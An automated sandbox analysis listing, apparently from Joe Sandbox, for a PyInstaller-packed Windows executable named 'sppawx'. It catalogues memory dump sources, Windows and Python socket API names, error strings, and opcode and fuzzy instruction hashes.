                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: inet_ntop
                                                                                                                                                                                                                              • String ID: invalid length of packed IP address string$iy*:inet_ntop$unknown address family %d
                                                                                                                                                                                                                              • API String ID: 448242623-2822559286
                                                                                                                                                                                                                              • Opcode ID: ab44d76d1b164076f45daeca5ca6ce7bf90a398625dee8c8aaeb868895e3ae08
                                                                                                                                                                                                                              • Instruction ID: f41761cec96adfd907e4f309a6192b38efc7d83cfcbae5e10e01c88ea21bbe27
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab44d76d1b164076f45daeca5ca6ce7bf90a398625dee8c8aaeb868895e3ae08
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8131DE31B18A83A1EA709B25E8646BD63A0FFC5B65F484433D94E87A74FE3CE448C711
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: getsockopt
                                                                                                                                                                                                                              • String ID: getsockopt buflen out of range$ii|i:getsockopt
                                                                                                                                                                                                                              • API String ID: 3272894102-2750947780
                                                                                                                                                                                                                              • Opcode ID: af3ce2296ad6df31b560dfe693c2ad11b715f74eee13cbd364207e2ffc102eee
                                                                                                                                                                                                                              • Instruction ID: 33f3a0eabdb9b71ecc647f4bb1f5219b8f44f24f6599f7413e990bca188d45a4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: af3ce2296ad6df31b560dfe693c2ad11b715f74eee13cbd364207e2ffc102eee
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC31E972A1CA46D3EB348B25E44416EB3B0FBC4B64F541136EA8E86A74EF3CD445CB40
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message
                                                                                                                                                                                                                              • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                              • API String ID: 2030045667-255084403
                                                                                                                                                                                                                              • Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                              • Instruction ID: e74d699b85bd072155c6ab6c3068ce818dbb823c0799ebde9350cc438ab1150d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91219F62B09B4192F660EB65B8847EAB3A4EB88784F80013EEE8D57659DF3CD645C710
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: gethostbyname
                                                                                                                                                                                                                              • String ID: et:gethostbyname_ex$idna$socket.gethostbyname
                                                                                                                                                                                                                              • API String ID: 930432418-574663143
                                                                                                                                                                                                                              • Opcode ID: d44dcbc1450e0ece8082216fb5d0cb223c8fcd31ccd8769a345dab2558ff02f1
                                                                                                                                                                                                                              • Instruction ID: 0b74dc766762d9c7234b281fdde7508319d9dfc71d1d28dad41d2f5afa335467
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d44dcbc1450e0ece8082216fb5d0cb223c8fcd31ccd8769a345dab2558ff02f1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F213061B18B82A2EB309B52E8446AE6360FBC8BE4F484133DE4D47F64EE7CE105C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: inet_pton
                                                                                                                                                                                                                              • String ID: illegal IP address string passed to inet_pton$is:inet_pton$unknown address family
                                                                                                                                                                                                                              • API String ID: 1350483568-903159468
                                                                                                                                                                                                                              • Opcode ID: 2e0364c41fc58222871f2a02cab5da7e9107dcf4eb12ef4afe779620dd439db4
                                                                                                                                                                                                                              • Instruction ID: c53b2d061d37e7fd5fee25b3049c1e2b3b86d2d3a44af12d4c6bb8bdf365039d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e0364c41fc58222871f2a02cab5da7e9107dcf4eb12ef4afe779620dd439db4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E321FC71A18A43A6EA70DB15E8510BD7371FFC4B65F584433E54E86AB4EF2CE505C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: inet_addr
                                                                                                                                                                                                                              • String ID: 255.255.255.255$illegal IP address string passed to inet_aton$s:inet_aton
                                                                                                                                                                                                                              • API String ID: 1393076350-4110412280
                                                                                                                                                                                                                              • Opcode ID: d3a0a141b8c8351c1f65ff41e06b6c15ce8ad099c8e127dd07fa3a748cb9a68d
                                                                                                                                                                                                                              • Instruction ID: c3b71c2cdcd9fd015f2431c38e82311a615e555470d2e43ff5b5dc10306bcaa8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d3a0a141b8c8351c1f65ff41e06b6c15ce8ad099c8e127dd07fa3a748cb9a68d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0401FB61A08A43A2EA30AB29E8401BD6371FFC5BB5F684133D61E86DB4FF2DD449C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: htons
                                                                                                                                                                                                                              • String ID: htons: Python int too large to convert to C 16-bit unsigned integer$htons: can't convert negative Python int to C 16-bit unsigned integer$i:htons
                                                                                                                                                                                                                              • API String ID: 4207154920-997571130
                                                                                                                                                                                                                              • Opcode ID: 7a52ab40b72408e01dadb9ee8914cffdd2d056b2ea03b7ad5085676dabdceb2a
                                                                                                                                                                                                                              • Instruction ID: 74038dbdbb7ea2a6692f6f45ab4c3dc12e50eedee5003c247d79c4b802b76bf5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a52ab40b72408e01dadb9ee8914cffdd2d056b2ea03b7ad5085676dabdceb2a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AAF0E764A08643A1EA349B16E89017C2360BFC5765F980433C54E9B9B0FF6DE408D310
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: htons
                                                                                                                                                                                                                              • String ID: i:ntohs$ntohs: Python int too large to convert to C 16-bit unsigned integer$ntohs: can't convert negative Python int to C 16-bit unsigned integer
                                                                                                                                                                                                                              • API String ID: 4207154920-2476431691
                                                                                                                                                                                                                              • Opcode ID: 43cc41ed7b1d004c9105da6575980c76dd7ba6c7d41bc1c10554f12c0e6f6707
                                                                                                                                                                                                                              • Instruction ID: 1581d4db6460ba4f8f886dddc4fe13a84ecff93ed414d8ed9602a47f63e720a6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43cc41ed7b1d004c9105da6575980c76dd7ba6c7d41bc1c10554f12c0e6f6707
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FFF0F964F08643B1EA349B15E8A407D63A0BFC8BA6F980033C54E96DB4FE6CE408D301
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2718003287-0
                                                                                                                                                                                                                              • Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                              • Instruction ID: 6f13d7355a447b337cb2b16aa368540a50fe4dc5cc010ef18627a4f7018a9e19
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0D1E172B1AA818AF720DF75D4402ACB7B1FB44798B84826EDE5D97B89DE38D006C350
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79A32CFBB), ref: 00007FF79A32D0EC
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79A32CFBB), ref: 00007FF79A32D177
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 953036326-0
                                                                                                                                                                                                                              • Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                              • Instruction ID: 6995a6c4d7836f3c3ade9fecc8060f629bbd5eb12901d578d04cdac9b6905bf3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B091B322E1A65189F7B0AF7594402BDBBA0FB44BC8F94417DDE4E57A95CF38E442C720
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4170891091-0
                                                                                                                                                                                                                              • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                              • Instruction ID: 3792dfb13cff3f18d9881d019c0e66cdf3257075df389e5363ed49343d3db61d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3051E372F0A1118BFB38EF3499516BCB7A1AB4435CFD1427DDE1E92AE5DB38A4118610
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2780335769-0
                                                                                                                                                                                                                              • Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                              • Instruction ID: e89e7d9330ac4f7a19c0994c40f32e66db41e33101acb9eb9cc5a0035b14d378
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC519E22E0A6418AFB20EF71D4503BDB3A5AB48B58F94847DEE4D97A89DF3CD5418720
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConditionMask$InfoVerifyVersion
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2793162063-0
                                                                                                                                                                                                                              • Opcode ID: 52014d617bdbf1a23e849bdeaec756294a92b9dcc7fe6566fb8264fe441ab811
                                                                                                                                                                                                                              • Instruction ID: e8c640c615f12464291ce0109130d36ae4625b9dd78b63b835c0430043da4dfd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 52014d617bdbf1a23e849bdeaec756294a92b9dcc7fe6566fb8264fe441ab811
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6314D36A19742A5EA70DB21E8187AD73A0BBC4BA0F584136DD5E46BA4EE3CE645C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1956198572-0
                                                                                                                                                                                                                              • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                              • Instruction ID: 341753ab018fe6a76de596b9a199baeba66350a323dafa424fae5e7309806819
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8211E921E0D14242F6A4EBBBE5492B9F251EB84784FC4417CEB4907B89CD2DD8D18224
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                              • Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                              • Instruction ID: f2298fdaefd2b869abe530aa26f401fead0b331a83ba4b977d153f7c8e5205c0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5115A22B19F058AFB10DF71E8492B973A4FB19758F840E39EA2D867A4DF3CD1548350
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
